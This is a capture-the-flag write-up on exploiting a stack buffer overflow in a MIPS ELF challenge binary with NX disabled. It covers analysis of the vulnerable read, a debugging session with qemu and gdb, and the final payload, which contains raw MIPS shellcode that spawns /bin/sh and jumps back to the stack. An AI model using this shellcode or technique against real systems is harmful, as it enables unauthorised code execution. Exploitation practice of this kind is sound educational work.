[PWN] ELF-MIPS-Stack-buffer-overflow-No-NX

Author: PhieuLang1993
Challenge: Here

Overview:

We have: NX is disabled, ASLR off

Determining Vulnerabilities:

– By fuzzing, we see that the programs call _ftext method, this method then calls function, and executes sys_exit after.

– Analyzing function:

– This function uses sys_write to print “Hello World\nWhat is your name: “. Then it uses sys_read to read(0, sp, 0x80), then sys_write(1, “Hello”, 7) and sys_write(1, sp, 0x14) (string from our input).

– Furthermore, we see that the program gets the value from sp+0x14 and push into $ra (https://en.wikibooks.org/wiki/MIPS_Assembly/Control_Flow_Instructions). Hence, this program is vulnerable to Stack Overflow so that we can control pc.

Exploit:

– We are going to write shellcode to sp and control sp to jump back and execute shellcode.

– Using gdb-multiarch and qemu-mips-static to debug this program:

  • Terminal 1:
$ qemu-mips-static -g 12345 ./ch65

  • Terminal 2:
$ gdb-multiarch -q
pwndbg: loaded 165 commands. Type pwndbg [filter] for a list
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
pwndbg> set architecture mips
The target architecture is assumed to be mips
pwndbg> set endian big
The target is assumed to be big endian
pwndbg> target remote 127.0.0.1:12345
Remote debugging using 127.0.0.1:12345
0x004000f0 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA

…[TRUNCATED]...

– String “Hello World…” is written.

– Then sys_read(0, sp=0x76fff6a8, 0x80), we have sp address = 0x76fff6a8.

– Terminal 1:

We entered: AAAABBBBCCCCDDDDEEEEFFFF00001111

– Terminal 2:

sys_write for “Hello….”

sys_write for entered string

– Take the value from $sp+0x14 and load into $ra, we see that $sp+0x14 = FFFF (0x46464646)

0x46464646 is invalid. Hence, we have stack address = 0x76fff6a8.

– Using shellcode from: http://shell-storm.org/shellcode/files/shellcode-782.php

– We have a payload:

shellcode_addr = 0x76fff6a8 + 0x14 + 4
shellcode = 
“\x24\x06\x06\x66\x04\xd0\xff\xff\x28\x06\xff\xff\x27\xbd\xff\xe0\x27\xe4\x10\x01\x24\x84\xf0\x1f\xaf\xa4\xff\xe8\xaf\xa0\xff\xec\x27\xa5\xff\xe8\x24\x02\x0f\xab\x01\x01\x01\x0c/bin/sh\x00"
payload = “A”*0x14
payload += p32(shellcode_addr)
payload += shellcode


Successfully Exploited:

Full payload:

Local: https://gist.github.com/phieulang1993/db8b01abf3380b87e711f7d53cf2cdde
Remote: https://gist.github.com/phieulang1993/ece9fcb4a58d51d2c5bddb6503cc4556